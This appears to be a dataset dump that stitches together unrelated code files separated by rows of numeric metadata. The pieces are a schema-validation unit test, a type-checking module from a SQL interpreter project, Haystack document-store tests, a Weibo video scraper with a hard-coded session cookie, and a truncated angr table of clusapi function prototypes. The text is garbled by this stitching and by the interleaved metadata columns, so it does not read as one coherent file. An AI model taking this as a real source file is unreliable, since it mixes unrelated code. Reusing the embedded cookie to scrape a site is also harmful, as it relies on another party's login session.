prop = flapi_schema.types.Array(BasicSchema, callback=None)
self.assertRaises(flapi_schema.errors.SchemaValidationError, prop, 12)
def test_callback(self):
prop = flapi_schema.types.Array(
BasicSchema, callback=lambda v: [{"thing": True}]
)
self.assertEqual(prop([{"thing": False}, {"thing": False}]), [{"thing": True}])
def test_no_callback(self):
prop = flapi_schema.types.Array(BasicSchema, callback=None)
self.assertEqual(prop([{"thing": False}]), [{"thing": False}])
| 37.478261
| 87
| 0.677108
| 330
| 2,586
| 5.078788
| 0.130303
| 0.196897
| 0.229117
| 0.136038
| 0.855609
| 0.855609
| 0.855609
| 0.74463
| 0.710024
| 0.636038
| 0
| 0.004824
| 0.198376
| 2,586
| 68
| 88
| 38.029412
| 0.803666
| 0
| 0
| 0.384615
| 0
| 0
| 0.011601
| 0
| 0
| 0
| 0
| 0
| 0.230769
| 1
| 0.230769
| false
| 0
| 0.057692
| 0
| 0.346154
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d78765ce2387258c1ebbe7af31057e0c66a7f90a
| 8,885
|
py
|
Python
|
parser/fase2/team26/G26/C3D/expresiones.py
|
webdev188/tytus
|
847071edb17b218f51bb969d335a8ec093d13f94
|
[
"MIT"
] | 35
|
2020-12-07T03:11:43.000Z
|
2021-04-15T17:38:16.000Z
|
parser/fase2/team26/G26/C3D/expresiones.py
|
webdev188/tytus
|
847071edb17b218f51bb969d335a8ec093d13f94
|
[
"MIT"
] | 47
|
2020-12-09T01:29:09.000Z
|
2021-01-13T05:37:50.000Z
|
parser/fase2/team26/G26/C3D/expresiones.py
|
webdev188/tytus
|
847071edb17b218f51bb969d335a8ec093d13f94
|
[
"MIT"
] | 556
|
2020-12-07T03:13:31.000Z
|
2021-06-17T17:41:10.000Z
|
import sys
sys.path.append('../G26/Utils')
sys.path.append('../G26/Expresiones')
from Error import *
from Primitivo import *
def compararTiposBin(arg1, arg2, sign):
try:
s = arg1.type
l = arg1
except:
''
try:
s = arg2.type
r = arg2
except:
''
if arg1.type == 'error':
return arg1
if arg2.type == 'error':
return arg2
left = l
right = r
if sign == '+':
if left.type == 'integer' or left.type == 'float' or left.type == 'money':
if right.type == 'integer' or right.type == 'float' or right.type == 'money':
if left.type == 'float' or right.type == 'float' or left.type == 'money' or right.type == 'money':
return Primitive('float', '')
return Primitive('integer', '')
return Error('Semántico', 'Error de tipos en MAS, no se puede operar ' + left.type + ' con ' + right.type, 0, 0)
if sign == '-':
if left.type == 'integer' or left.type == 'float' or left.type == 'money':
if right.type == 'integer' or right.type == 'float' or right.type == 'money':
if left.type == 'float' or right.type == 'float' or left.type == 'money' or right.type == 'money':
return Primitive('float', '')
return Primitive('integer', '')
return Error('Semántico', 'Error de tipos en MENOS, no se puede operar ' + left.type + ' con ' + right.type, 0, 0)
if sign == '/':
if left.type == 'integer' or left.type == 'float':
if right.type == 'integer' or right.type == 'float':
if right.val == 0:
return Error('Semántico', 'No es posible la division con 0', 0, 0)
return Primitive('float', '')
return Error('Semántico', 'Error de tipos en DIVISION, no se puede operar ' + left.type + ' con ' + right.type, 0, 0)
if sign == '*':
if left.type == 'integer' or left.type == 'float' or left.type == 'money':
if right.type == 'integer' or right.type == 'float' or right.type == 'money':
if left.type == 'float' or right.type == 'float' or left.type == 'money' or right.type == 'money':
return Primitive('float', '')
return Primitive('integer', '')
return Error('Semántico', 'Error de tipos en MULTIPLICACION, no se puede operar ' + left.type + ' con ' + right.type, 0, 0)
if sign == '%':
if left.type == 'integer' or left.type == 'float':
if right.type == 'integer' or right.type == 'float':
return Primitive('integer', '')
return Error('Semántico', 'Error de tipos en PORCENTAJE, no se puede operar ' + left.type + ' con ' + right.type, 0, 0)
if sign == '^':
if left.type == 'integer' or left.type == 'float' or left.type == 'money':
if right.type == 'integer' or right.type == 'float' or right.type == 'money':
if left.type == 'float' or right.type == 'float' or left.type == 'money' or right.type == 'money':
return Primitive('float', '')
return Primitive('integer', '')
return Error('Semántico', 'Error de tipos en POTENCIA, no se puede operar ' + left.type + ' con ' + right.type, 0, 0)
return Primitive('float', '')
def compararTiposCon(arg1, arg2, sign, arg3):
try:
s = arg1.type
l = arg1
except:
''
try:
s = arg2.type
r = arg2
except:
r = ''
try:
s = arg3.type
e = arg3
except:
e = ''
print(arg1)
print(arg2)
print(arg3)
if arg1.type == 'error':
return arg1
try:
if arg2.type == 'error':
return arg2
except:
''
try:
if arg3.type == 'error':
return arg3
except:
''
left = l
right = r
extra = e
if sign == '<':
if left.type == 'integer' or left.type == 'float' or left.type == 'money':
if right.type == 'integer' or right.type == 'float' or right.type == 'money':
return Primitive('boolean', '')
if left.type == 'string' or left.type == 'date' or left.type == 'time':
if right.type == 'string' or right.type == 'date' or right.type == 'time':
return Primitive('boolean', '')
return Error('Semántico', 'Error de tipos en MENOR QUE, no se puede operar ' + left.type + ' con ' + right.type, 0, 0)
if sign == '<=':
if left.type == 'integer' or left.type == 'float' or left.type == 'money':
if right.type == 'integer' or right.type == 'float' or right.type == 'money':
return Primitive('boolean', '')
if left.type == 'string' or left.type == 'date' or left.type == 'time':
if right.type == 'string' or right.type == 'date' or right.type == 'time':
return Primitive('boolean', '')
return Error('Semántico', 'Error de tipos en MENOR IGUAL QUE, no se puede operar ' + left.type + ' con ' + right.type, 0, 0)
if sign == '>':
if left.type == 'integer' or left.type == 'float' or left.type == 'money':
if right.type == 'integer' or right.type == 'float' or right.type == 'money':
return Primitive('boolean', '')
if left.type == 'string' or left.type == 'date' or left.type == 'time':
if right.type == 'string' or right.type == 'date' or right.type == 'time':
return Primitive('boolean', '')
if left.type == 'boolean' and right.type == 'boolean':
return Primitive('boolean', '')
return Error('Semántico', 'Error de tipos en MAYOR QUE, no se puede operar ' + left.type + ' con ' + right.type, 0, 0)
if sign == '>=':
if left.type == 'integer' or left.type == 'float' or left.type == 'money':
if right.type == 'integer' or right.type == 'float' or right.type == 'money':
return Primitive('boolean', '')
if left.type == 'string' or left.type == 'date' or left.type == 'time':
if right.type == 'string' or right.type == 'date' or right.type == 'time':
return Primitive('boolean', '')
if left.type == 'boolean' and right.type == 'boolean':
return Primitive('boolean', '')
return Error('Semántico', 'Error de tipos en MAYOR IGUAL QUE, no se puede operar ' + left.type + ' con ' + right.type, 0, 0)
if sign == '=':
if left.type == 'integer' or left.type == 'float' or left.type == 'money':
if right.type == 'integer' or right.type == 'float' or right.type == 'money':
return Primitive('boolean', '')
if left.type == 'string' or left.type == 'date' or left.type == 'time':
if right.type == 'string' or right.type == 'date' or right.type == 'time':
return Primitive('boolean', '')
if left.type == 'boolean' and right.type == 'boolean':
return Primitive('boolean', '')
return Error('Semántico', 'Error de tipos en IGUAL, no se puede operar ' + left.type + ' con ' + right.type, 0, 0)
if sign == '<>' or sign == '!=':
if left.type == 'integer' or left.type == 'float' or left.type == 'money':
if right.type == 'integer' or right.type == 'float' or right.type == 'money':
return Primitive('boolean', '')
if left.type == 'string' or left.type == 'date' or left.type == 'time':
if right.type == 'string' or right.type == 'date' or right.type == 'time':
return Primitive('boolean', '')
if left.type == 'boolean' and right.type == 'boolean':
return Primitive('boolean', '')
return Error('Semántico', 'Error de tipos en DIFERENTE, no se puede operar ' + left.type + ' con ' + right.type, 0, 0)
if sign == 'between' or sign == 'not':
if left.type == 'integer' or left.type == 'float' or left.type == 'money':
if right.type == 'integer' or right.type == 'float' or right.type == 'money':
if extra.type == 'integer' or extra.type == 'float' or extra.type == 'money':
return Primitive('boolean', '')
if left.type == 'string' or left.type == 'date' or left.type == 'time':
if right.type == 'string' or right.type == 'date' or right.type == 'time':
if extra.type == 'integer' or extra.type == 'float' or extra.type == 'money':
return Primitive('boolean', '')
if left.type == 'boolean' and right.type == 'boolean' and extra.type == 'boolean':
return Primitive('boolean', '')
return Error('Semántico', 'Error de tipos en BETWEEN, no se puede operar ' + left.type + ' con ' + right.type, 0, 0)
return Primitive('boolean', '')
| 45.564103
| 132
| 0.530895
| 1,106
| 8,885
| 4.264919
| 0.060579
| 0.142463
| 0.107272
| 0.057664
| 0.907144
| 0.90142
| 0.88022
| 0.873013
| 0.873013
| 0.873013
| 0
| 0.010044
| 0.305234
| 8,885
| 194
| 133
| 45.798969
| 0.75409
| 0
| 0
| 0.722892
| 0
| 0
| 0.218571
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.012048
| false
| 0
| 0.018072
| 0
| 0.331325
| 0.018072
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d78f57ba200fa1a90dcecc8c5ffdf08a3e4320c0
| 4,444
|
py
|
Python
|
test/test_in_memory_store.py
|
arthurbarros/haystack
|
886f5ba90ed15aecd10c509a8e57334eefcf69c2
|
[
"Apache-2.0"
] | null | null | null |
test/test_in_memory_store.py
|
arthurbarros/haystack
|
886f5ba90ed15aecd10c509a8e57334eefcf69c2
|
[
"Apache-2.0"
] | null | null | null |
test/test_in_memory_store.py
|
arthurbarros/haystack
|
886f5ba90ed15aecd10c509a8e57334eefcf69c2
|
[
"Apache-2.0"
] | null | null | null |
from haystack import Finder
from haystack.reader.transformers import TransformersReader
from haystack.retriever.tfidf import TfidfRetriever
def test_finder_get_answers_with_in_memory_store():
test_docs = [
{"name": "testing the finder 1", "text": "testing the finder with pyhton unit test 1", 'meta': {'url': 'url'}},
{"name": "testing the finder 2", "text": "testing the finder with pyhton unit test 2", 'meta': {'url': 'url'}},
{"name": "testing the finder 3", "text": "testing the finder with pyhton unit test 3", 'meta': {'url': 'url'}}
]
from haystack.database.memory import InMemoryDocumentStore
document_store = InMemoryDocumentStore()
document_store.write_documents(test_docs)
retriever = TfidfRetriever(document_store=document_store)
reader = TransformersReader(model="distilbert-base-uncased-distilled-squad",
tokenizer="distilbert-base-uncased", use_gpu=-1)
finder = Finder(reader, retriever)
prediction = finder.get_answers(question="testing finder", top_k_retriever=10,
top_k_reader=5)
assert prediction is not None
def test_memory_store_get_by_tags():
test_docs = [
{"name": "testing the finder 1", "text": "testing the finder with pyhton unit test 1", 'meta': {'url': 'url'}},
{"name": "testing the finder 2", "text": "testing the finder with pyhton unit test 2", 'meta': {'url': None}},
{"name": "testing the finder 3", "text": "testing the finder with pyhton unit test 3", 'meta': {'url': 'url'}}
]
from haystack.database.memory import InMemoryDocumentStore
document_store = InMemoryDocumentStore()
document_store.write_documents(test_docs)
docs = document_store.get_document_ids_by_tags({'has_url': 'false'})
assert docs == []
def test_memory_store_get_by_tag_lists_union():
test_docs = [
{"name": "testing the finder 1", "text": "testing the finder with pyhton unit test 1", 'meta': {'url': 'url'}, 'tags': [{'tag2': ["1"]}]},
{"name": "testing the finder 2", "text": "testing the finder with pyhton unit test 2", 'meta': {'url': None}, 'tags': [{'tag1': ['1']}]},
{"name": "testing the finder 3", "text": "testing the finder with pyhton unit test 3", 'meta': {'url': 'url'}, 'tags': [{'tag2': ["1", "2"]}]}
]
from haystack.database.memory import InMemoryDocumentStore
document_store = InMemoryDocumentStore()
document_store.write_documents(test_docs)
docs = document_store.get_document_ids_by_tags({'tag2': ["1"]})
assert docs == [
{'name': 'testing the finder 1', 'text': 'testing the finder with pyhton unit test 1', 'meta': {'url': 'url'}, 'tags': [{'tag2': ['1']}]},
{'name': 'testing the finder 3', 'text': 'testing the finder with pyhton unit test 3', 'meta': {'url': 'url'}, 'tags': [{'tag2': ['1', '2']}]}
]
def test_memory_store_get_by_tag_lists_non_existent_tag():
test_docs = [
{"name": "testing the finder 1", "text": "testing the finder with pyhton unit test 1", 'meta': {'url': 'url'}, 'tags': [{'tag1': ["1"]}]},
]
from haystack.database.memory import InMemoryDocumentStore
document_store = InMemoryDocumentStore()
document_store.write_documents(test_docs)
docs = document_store.get_document_ids_by_tags({'tag1': ["3"]})
assert docs == []
def test_memory_store_get_by_tag_lists_disjoint():
test_docs = [
{"name": "testing the finder 1", "text": "testing the finder with pyhton unit test 1", 'meta': {'url': 'url'}, 'tags': [{'tag1': ["1"]}]},
{"name": "testing the finder 2", "text": "testing the finder with pyhton unit test 2", 'meta': {'url': None}, 'tags': [{'tag2': ['1']}]},
{"name": "testing the finder 3", "text": "testing the finder with pyhton unit test 3", 'meta': {'url': 'url'}, 'tags': [{'tag3': ["1", "2"]}]},
{"name": "testing the finder 4", "text": "testing the finder with pyhton unit test 3", 'meta': {'url': 'url'}, 'tags': [{'tag3': ["1", "3"]}]}
]
from haystack.database.memory import InMemoryDocumentStore
document_store = InMemoryDocumentStore()
document_store.write_documents(test_docs)
docs = document_store.get_document_ids_by_tags({'tag3': ["3"]})
assert docs == [{'name': 'testing the finder 4', 'text': 'testing the finder with pyhton unit test 3', 'meta': {'url': 'url'}, 'tags': [{'tag3': ['1', '3']}]}]
| 51.08046
| 163
| 0.638164
| 567
| 4,444
| 4.844797
| 0.121693
| 0.123771
| 0.198034
| 0.123771
| 0.819075
| 0.819075
| 0.804878
| 0.80233
| 0.791045
| 0.791045
| 0
| 0.019684
| 0.188344
| 4,444
| 86
| 164
| 51.674419
| 0.741891
| 0
| 0
| 0.430769
| 0
| 0
| 0.350585
| 0.013951
| 0
| 0
| 0
| 0
| 0.076923
| 1
| 0.076923
| false
| 0
| 0.123077
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d79076f8a625f064bd9acb31291e908a6130ef52
| 5,393
|
py
|
Python
|
step1/weibo.py
|
karoyqiu/xbmc-kodi-private-china-addons
|
e63026c15a72736f7a9d04480639891979b36cca
|
[
"MIT"
] | 420
|
2020-03-03T06:41:55.000Z
|
2022-03-31T00:10:43.000Z
|
step1/weibo.py
|
karoyqiu/xbmc-kodi-private-china-addons
|
e63026c15a72736f7a9d04480639891979b36cca
|
[
"MIT"
] | 21
|
2020-05-19T00:05:14.000Z
|
2022-02-18T16:34:31.000Z
|
step1/weibo.py
|
karoyqiu/xbmc-kodi-private-china-addons
|
e63026c15a72736f7a9d04480639891979b36cca
|
[
"MIT"
] | 72
|
2020-04-06T13:15:39.000Z
|
2022-03-31T23:23:51.000Z
|
#热门推荐(纪录片,评测,娱乐都没有)
import json
import requests
import re
from bs4 import BeautifulSoup
import urllib
url = 'https://weibo.com/video/aj/load?ajwvr=6&page=2&type=channel&hot_recommend_containerid=video_tag_15&__rnd=1584096137063'
cookies = dict(SUB='_2AkMpN-raf8NxqwJRmfoXxGniZIl_ygvEieKfaxsBJRMxHRl-yj92qhFTtRB6ArfENQBVM_xipNLvZYca4pNo4lw7p9Xi')
headers = {'user-agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36'}
rec = requests.get(url,headers=headers,cookies=cookies)
rec.encoding = 'utf-8'
rectext = rec.text
print(rectext)
num = re.sub(r'\\n', "", rectext)
num = re.sub(r'\\', "", num)
print(num)
soup = BeautifulSoup(num, 'html.parser')
list = soup.find_all('div',class_='V_list_a')
print(len(list))
for index in range(len(list)):
#soup = BeautifulSoup(list[index], 'html.parser')
videosource = list[index]['video-sources']
videosource = urllib.parse.unquote(videosource,encoding='utf-8',errors='replace')
videosource = urllib.parse.unquote(videosource,encoding='utf-8',errors='replace')
videosource = videosource[8:]
mp4 = videosource.split('http:')
#q = videosource
imgsrc = list[index].find('img')
imgsrc = imgsrc['src']
title = list[index]['action-data']
str1 = title.find('&title=')
str2 = title.find('&uid=')
title = title[str1+7:str2]
title = urllib.parse.unquote(title,encoding='utf-8',errors='replace')
print(title)
print('http:' + imgsrc[6:])
print('http:' + mp4[0])
print('*******'*30)
#编辑推荐
import json
import requests
import re
from bs4 import BeautifulSoup
import urllib
url = 'https://weibo.com/tv?type=channel&first_level_channel_id=4453781547450385&broadcast_id=4476916414218244'
cookies = dict(SUB='_2AkMpN-raf8NxqwJRmfoXxGniZIl_ygvEieKfaxsBJRMxHRl-yj92qhFTtRB6ArfENQBVM_xipNLvZYca4pNo4lw7p9Xi')
headers = {'user-agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36'}
rec = requests.get(url,headers=headers,cookies=cookies)
rec.encoding = 'utf-8'
rectext = rec.text
#print(rectext)
soup = BeautifulSoup(rectext, 'html.parser')
list = soup.find_all('div',class_='V_list_a')
for index in range(len(list)):
videosource = list[index]['video-sources']
videosource = urllib.parse.unquote(videosource,encoding='utf-8',errors='replace')
videosource = urllib.parse.unquote(videosource,encoding='utf-8',errors='replace')
videosource = videosource[8:]
mp4 = videosource.split('http:')
img = list[index].find('img')
img = img['src']
if img[0:4] == 'http':
img = 'http' + img[5:]
else:
img = 'http:' + img
title = list[index].find('h3')
print(title.text)
print(img)
print('http:' + mp4[len(mp4)-1])
#排行榜
import json
import requests
import re
from bs4 import BeautifulSoup
import urllib
url = 'https://weibo.com/tv?type=dayrank'
cookies = dict(SUB='_2AkMpN-raf8NxqwJRmfoXxGniZIl_ygvEieKfaxsBJRMxHRl-yj92qhFTtRB6ArfENQBVM_xipNLvZYca4pNo4lw7p9Xi')
headers = {'user-agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36'}
rec = requests.get(url,headers=headers,cookies=cookies)
rec.encoding = 'utf-8'
rectext = rec.text
#print(rectext)
soup = BeautifulSoup(rectext, 'html.parser')
list = soup.find_all('div',class_='V_list_a')
for index in range(len(list)):
videosource = list[index]['video-sources']
videosource = urllib.parse.unquote(videosource,encoding='utf-8',errors='replace')
videosource = urllib.parse.unquote(videosource,encoding='utf-8',errors='replace')
videosource = videosource[8:]
mp4 = videosource.split('http:')
img = list[index].find('img')
img = img['src']
if img[0:4] == 'http':
img = 'http' + img[5:]
else:
img = 'http:' + img
title = list[index].find('h3')
title = title.text
title = title.replace(' ', '').replace('\n','')
if len(title) > 40:
title = title[:40] + '...'
print(title)
print(img)
print('http:' + mp4[len(mp4)-1])
#故事
import json
import requests
import re
from bs4 import BeautifulSoup
import urllib
url = 'https://weibo.com/tv?type=story'
cookies = dict(SUB='_2AkMpN-raf8NxqwJRmfoXxGniZIl_ygvEieKfaxsBJRMxHRl-yj92qhFTtRB6ArfENQBVM_xipNLvZYca4pNo4lw7p9Xi')
headers = {'user-agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36'}
rec = requests.get(url,headers=headers,cookies=cookies)
rec.encoding = 'utf-8'
rectext = rec.text
#print(rectext)
soup = BeautifulSoup(rectext, 'html.parser')
list = soup.find_all('div',class_='V_list_b')
for index in range(len(list)):
#print(list[index])
if list[index]['action-data'][:9] != 'type=live':
videosource = list[index]['video-sources']
videosource = urllib.parse.unquote(videosource,encoding='utf-8',errors='replace')
videosource = urllib.parse.unquote(videosource,encoding='utf-8',errors='replace')
videosource = videosource[8:]
mp4 = videosource.split('http:')
img = list[index].find('img')
img = img['src']
if img[0:4] == 'http':
img = 'http' + img[5:]
else:
img = 'http:' + img
like = list[index].find('div',class_='like')
like = like.text
likenum = re.findall(r'\d+',like)
print(str(likenum[0] + '赞'))
print(img)
print('http:' + mp4[len(mp4)-1])
else:
index = index +1
| 30.468927
| 144
| 0.698683
| 742
| 5,393
| 5.025606
| 0.181941
| 0.036203
| 0.041834
| 0.043443
| 0.814159
| 0.800751
| 0.788951
| 0.788951
| 0.76723
| 0.76723
| 0
| 0.055981
| 0.128871
| 5,393
| 177
| 145
| 30.468927
| 0.737761
| 0.027814
| 0
| 0.755725
| 0
| 0.038168
| 0.308177
| 0.071838
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.152672
| 0
| 0.152672
| 0.122137
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ad5f9d9a2bb3b2591d04a9e45b96929d3bd5a002
| 94,767
|
py
|
Python
|
angr/procedures/definitions/win32_clusapi.py
|
r4b3rt/angr
|
c133cfd4f83ffea2a1d9e064241e9459eaabc55f
|
[
"BSD-2-Clause"
] | null | null | null |
angr/procedures/definitions/win32_clusapi.py
|
r4b3rt/angr
|
c133cfd4f83ffea2a1d9e064241e9459eaabc55f
|
[
"BSD-2-Clause"
] | null | null | null |
angr/procedures/definitions/win32_clusapi.py
|
r4b3rt/angr
|
c133cfd4f83ffea2a1d9e064241e9459eaabc55f
|
[
"BSD-2-Clause"
] | null | null | null |
# pylint:disable=line-too-long
import logging
from ...sim_type import SimTypeFunction, SimTypeShort, SimTypeInt, SimTypeLong, SimTypeLongLong, SimTypeDouble, SimTypeFloat, SimTypePointer, SimTypeChar, SimStruct, SimTypeFixedSizeArray, SimTypeBottom, SimUnion, SimTypeBool
from ...calling_conventions import SimCCStdcall, SimCCMicrosoftAMD64
from .. import SIM_PROCEDURES as P
from . import SimLibrary
_l = logging.getLogger(name=__name__)
lib = SimLibrary()
lib.set_default_cc('X86', SimCCStdcall)
lib.set_default_cc('AMD64', SimCCMicrosoftAMD64)
lib.set_library_names("clusapi.dll")
prototypes = \
{
#
'GetNodeClusterState': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpszNodeName", "pdwClusterState"]),
#
'OpenCluster': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), arg_names=["lpszClusterName"]),
#
'OpenClusterEx': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), arg_names=["lpszClusterName", "DesiredAccess", "GrantedAccess"]),
#
'CloseCluster': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hCluster"]),
#
'SetClusterName': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hCluster", "lpszNewClusterName"]),
#
'GetClusterInformation': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimStruct({"dwVersionInfoSize": SimTypeInt(signed=False, label="UInt32"), "MajorVersion": SimTypeShort(signed=False, label="UInt16"), "MinorVersion": SimTypeShort(signed=False, label="UInt16"), "BuildNumber": SimTypeShort(signed=False, label="UInt16"), "szVendorId": SimTypeFixedSizeArray(SimTypeChar(label="Char"), 64), "szCSDVersion": SimTypeFixedSizeArray(SimTypeChar(label="Char"), 64), "dwClusterHighestVersion": SimTypeInt(signed=False, label="UInt32"), "dwClusterLowestVersion": SimTypeInt(signed=False, label="UInt32"), "dwFlags": SimTypeInt(signed=False, label="UInt32"), "dwReserved": SimTypeInt(signed=False, label="UInt32")}, name="CLUSTERVERSIONINFO", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hCluster", "lpszClusterName", "lpcchClusterName", "lpClusterInfo"]),
#
'GetClusterQuorumResource': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hCluster", "lpszResourceName", "lpcchResourceName", "lpszDeviceName", "lpcchDeviceName", "lpdwMaxQuorumLogSize"]),
#
'SetClusterQuorumResource': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HRESOURCE", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hResource", "lpszDeviceName", "dwMaxQuoLogSize"]),
#
'BackupClusterDatabase': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hCluster", "lpszPathName"]),
#
'RestoreClusterDatabase': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=True, label="Int32"), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpszPathName", "bForce", "lpszQuorumDriveLetter"]),
#
'SetClusterNetworkPriorityOrder': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypePointer(SimStruct({}, name="_HNETWORK", pack=False, align=None), offset=0), label="LPArray", offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hCluster", "NetworkCount", "NetworkList"]),
#
'SetClusterServiceAccountPassword': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"NodeId": SimTypeInt(signed=False, label="UInt32"), "SetAttempted": SimTypeChar(label="Byte"), "ReturnStatus": SimTypeInt(signed=False, label="UInt32")}, name="CLUSTER_SET_PASSWORD_STATUS", pack=False, align=None), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpszClusterName", "lpszNewPassword", "dwFlags", "lpReturnStatusBuffer", "lpcbReturnStatusBufferSize"]),
#
'ClusterControl': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hCluster", "hHostNode", "dwControlCode", "lpInBuffer", "nInBufferSize", "lpOutBuffer", "nOutBufferSize", "lpBytesReturned"]),
#
'ClusterUpgradeFunctionalLevel': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypeInt(signed=True, label="Int32"), SimTypePointer(SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="CLUSTER_UPGRADE_PHASE")], SimTypeInt(signed=True, label="Int32"), arg_names=["pvCallbackArg", "eUpgradePhase"]), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hCluster", "perform", "pfnProgressCallback", "pvCallbackArg"]),
#
'CreateClusterNotifyPortV2': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCHANGE", pack=False, align=None), offset=0), SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimStruct({"dwObjectType": SimTypeInt(signed=False, label="UInt32"), "FilterFlags": SimTypeLongLong(signed=True, label="Int64")}, name="NOTIFY_FILTER_AND_TYPE", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0)], SimTypePointer(SimStruct({}, name="_HCHANGE", pack=False, align=None), offset=0), arg_names=["hChange", "hCluster", "Filters", "dwFilterCount", "dwNotifyKey"]),
#
